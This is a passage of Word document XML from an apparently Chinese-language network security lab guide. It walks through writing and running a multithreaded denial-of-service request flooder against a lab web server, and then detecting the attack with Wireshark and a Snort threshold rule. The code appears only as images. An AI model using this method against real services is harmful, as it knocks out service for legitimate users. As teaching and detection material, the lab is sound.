      </w:r>
    </w:p>
    <w:p w14:paraId="12C506AE" w14:textId="77777777" w:rsidR="000B1CDF" w:rsidRDefault="000B1CDF" w:rsidP="000B1CDF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="259C89E3" wp14:editId="609D6B7F">
            <wp:extent cx="5266844" cy="389467"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37690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08615" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId15"/>
                    <a:srcRect b="86676"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="390019"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9E05D9" w14:textId="77777777" w:rsidR="000B1CDF" w:rsidRDefault="000B1CDF" w:rsidP="000B1CDF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E0ED0CE" wp14:editId="24B515BF">
            <wp:extent cx="5274310" cy="1016000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="13920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9789" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId16"/>
                    <a:srcRect b="65293"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1016000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CC5406" w14:textId="77777777" w:rsidR="000B1CDF" w:rsidRDefault="000B1CDF" w:rsidP="000B1CDF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41339EB4" wp14:editId="745C2D77">
            <wp:extent cx="5274310" cy="2927350"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="1926626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6427" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2927350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C04178" w14:textId="77777777" w:rsidR="000B1CDF" w:rsidRDefault="000B1CDF" w:rsidP="000B1CDF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F49126A" wp14:editId="01541A71">
            <wp:extent cx="5274310" cy="2927350"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="1779907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07585" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2927350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A989E37"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步骤3：网络用户访问网络应用服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFA48EC"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步骤要求：在网络用户服务器上访问网络应用服务，并查看网络应用服务器的资源占用情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCC4E43"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涉及知识：无拒绝服务攻击</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>时网络</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>服务正常，占用资源低</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FE91A1" w14:textId="6A159B37" w:rsidR="00DA262B" w:rsidRDefault="00DA262B" w:rsidP="004B4EB0">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1）在节点详情中，通过远程连接方式登陆网络用户端，根据节点IP，通过浏览器访问网络应用服务（Web服务），显示成功访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FE35EE" w14:textId="77777777" w:rsidR="004B4EB0" w:rsidRDefault="004B4EB0" w:rsidP="004B4EB0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3867B651" wp14:editId="7DCA0682">
            <wp:extent cx="5274310" cy="3320415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="999408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08097" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3320415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B054E9" w14:textId="5B7A5572" w:rsidR="00DA262B" w:rsidRDefault="00DA262B" w:rsidP="00A066A2">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2）通过远程连接方式登陆网络应用服务（Web服务器），查看任务管理器，发现其CPU资源等占用非常低。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7865DAF1" w14:textId="2ADB93F2" w:rsidR="00A066A2" w:rsidRPr="00DA262B" w:rsidRDefault="00C66B7F" w:rsidP="00A066A2">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44C7874D" wp14:editId="193112E7">
            <wp:extent cx="5274310" cy="3318510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1440094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94708" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3318510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F39B23"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步骤4：开发拒绝服务攻击代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30934CBC"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lastRenderedPageBreak/>
        <w:t>步骤要求：在拒绝服务攻击</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>者端开发</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>多线程攻击流量生成程序，实现并发产生高强度的网络应用服务请求，并将被攻击的网络应用服务器节点IP、并发线程数量作为程序的输入参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B80538" w14:textId="2B4C9BA7" w:rsidR="00DA262B" w:rsidRDefault="00DA262B" w:rsidP="00C66B7F">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涉及知识：编程技术、计算机网络、多线程开发、网络应用协议</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D6FE7A" w14:textId="4F7B8DA4" w:rsidR="00C66B7F" w:rsidRPr="00DA262B" w:rsidRDefault="00C66B7F" w:rsidP="00EF64AA">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51F59F39" wp14:editId="34D894E5">
            <wp:extent cx="5138508" cy="3233066"/>
            <wp:effectExtent l="0" t="0" r="5080" b="5715"/>
            <wp:docPr id="759542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42265" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5138508" cy="3233066"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FACFBC7"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步骤5：实施拒绝服务攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A43D13E"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步骤要求：执行编写的拒绝服务攻击程序（将被攻击的网络应用服务器IP地址、并发线程数量作为程序的输入参数），通过调节并发线程数量，调节拒绝服务攻击请求数量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BF0A18" w14:textId="77777777" w:rsid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涉及知识：多线程数量对拒绝服务攻击请求数量强度的影响</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F31B00" w14:textId="4AA447B8" w:rsidR="00DA262B" w:rsidRPr="00DA262B" w:rsidRDefault="00C66B7F" w:rsidP="00C66B7F">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00DCA24A" wp14:editId="4A337F77">
            <wp:extent cx="5273947" cy="3272828"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3810"/>
            <wp:docPr id="365806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06021" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId22"/>
                    <a:srcRect t="682" b="745"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5273947" cy="3272828"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3935D6C0"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步骤6：对比查看拒绝服务攻击效果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617C4BE7"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步骤要求：拒绝服务攻击发生时，在网络用户</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>端访问</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>网络应用，查看访问结果和资源占用情况，并与前述的无攻击时的情况进行对比。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7878DA0C"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涉及知识：拒绝服务攻击对计算资源等的消耗威害</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D417C6" w14:textId="5AA2022C" w:rsidR="00DA262B" w:rsidRDefault="00DA262B" w:rsidP="00EB6085">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1）拒绝服务攻击发生时，在网络用户</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>端访问</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>网络应用（以Web网络服务为例，通过浏览器访问Web服务器，发现无法访问成功，返回错误码为503的Service Unavailable）。而在无拒绝攻击时，能够访问成功Web服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196D6FC5" w14:textId="2182E58A" w:rsidR="00EB6085" w:rsidRPr="00DA262B" w:rsidRDefault="00EB6085" w:rsidP="00EB6085">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35ACB3F4" wp14:editId="7B41F0FF">
            <wp:extent cx="5274310" cy="3320415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="65466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60151" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3320415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA107BE" w14:textId="1BFA9545" w:rsidR="00DA262B" w:rsidRDefault="00DA262B" w:rsidP="00EB6085">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2）在拒绝服务攻击发生时，在网络应用端（Web服务器）查看，发现CPU资源占用率非常高，相较于无攻击发生时，CPU占用率大幅升高。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DBE3C0" w14:textId="5721DE7B" w:rsidR="00EB6085" w:rsidRPr="00DA262B" w:rsidRDefault="00EB6085" w:rsidP="00EB6085">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4960F830" wp14:editId="4768C06E">
            <wp:extent cx="5274310" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="585438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38718" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="517A7302"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步骤7：捕获网络流量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619AEF5D"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步骤要求：在入侵检测端使用网络流量捕获工具Wireshark等，通过与交换机镜像端口相连的网络接口，捕获包含拒绝服务攻击的网络流量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A60E19" w14:textId="32129843" w:rsidR="00DA262B" w:rsidRPr="00DA262B" w:rsidRDefault="00DA262B" w:rsidP="00EB6085">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lastRenderedPageBreak/>
        <w:t>涉及知识：网络流量捕获技术、网络流量捕获工具Wireshark等的使用。</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5719C9EE"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步骤8：分析拒绝服务攻击流量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1364A600"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步骤要求：在入侵检测</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>端结合</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>TCP/IP、网络应用协议等知识，使用网络流量分析工具Wireshark等观察、分析和总结拒绝服务攻击流量特征。发现在短时间内，网络应用（Web服务器）收到了大量的网络请求，无法正常提供服务（返回给网络用户的消息为异常信息503 Service unavailable）。分析发现网络流量中含有大量来自同一个源地址的网络请求，具有显著的拒绝服务攻击的高频特征。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17410F1E"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涉及知识：网络TCP/IP报文格式解析、网络应用协议分析。</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ED9F75" w14:textId="0E67FF09" w:rsidR="00DA262B" w:rsidRPr="00DA262B" w:rsidRDefault="00EB6085" w:rsidP="00EB6085">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46AFB4B1" wp14:editId="5CE13A73">
            <wp:extent cx="5274310" cy="3320415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1963072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72934" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3320415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6897E3"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步骤9：配置拒绝服务攻击检测规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5697B69B"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入侵检测上，把短时间内来自同一个源地址的网络服务请求的高频特征作为拒绝服务攻击识别的显著特征。在入侵检测系统Snort的规则文件中，将单位时间内收到网络应用请求的数量阈值作为攻击检测特征和告警规则进行配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15453BAB"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涉及知识：入侵检测工具Snort等的使用、攻击检测和告警规则配置。</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0EBD0E" w14:textId="6CCF17E7" w:rsidR="00DA262B" w:rsidRPr="00DA262B" w:rsidRDefault="00EB6085" w:rsidP="00EB6085">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FD4FC1E" wp14:editId="2D6ABA64">
            <wp:extent cx="5274310" cy="3320415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="94065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56989" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3320415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE2B019"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步骤10：检测拒绝服务攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068A61AA"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步骤要求：运行入侵检测工具Snort等，并查看告警日志，验证配置的包含拒绝服务攻击检测识别特征的告警规则是否生效和记录告警日志。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D15B2D"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涉及知识：入侵检测工具Snort等的使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA38B76" w14:textId="727D47CC"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1）在入侵检测的命令行终端上运行入侵检测工具Snort的命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2A1DF5" w14:textId="7B499074" w:rsidR="00DA262B" w:rsidRPr="00DA262B" w:rsidRDefault="00EB6085" w:rsidP="00EB6085">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5037B4F7" wp14:editId="1D49D2EA">
            <wp:extent cx="5274310" cy="3320415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="870920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20372" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3320415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73411483" w14:textId="77777777" w:rsidR="00DA262B" w:rsidRPr="00DA262B" w:rsidRDefault="00DA262B" w:rsidP="00DA262B">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lastRenderedPageBreak/>
        <w:t>2）在入侵检测工具Snort的日志文件中查找触发网络攻击告警信息的检测规则的编号是否与之前配置的检测规则的编号相同，验证网络攻击检测规则。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BCD65C" w14:textId="16A28DC2" w:rsidR="00DA262B" w:rsidRDefault="000D3ED7" w:rsidP="00EB6085">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75251BB9" wp14:editId="7C79F98A">
            <wp:extent cx="5274310" cy="3320415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1275909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09969" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3320415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
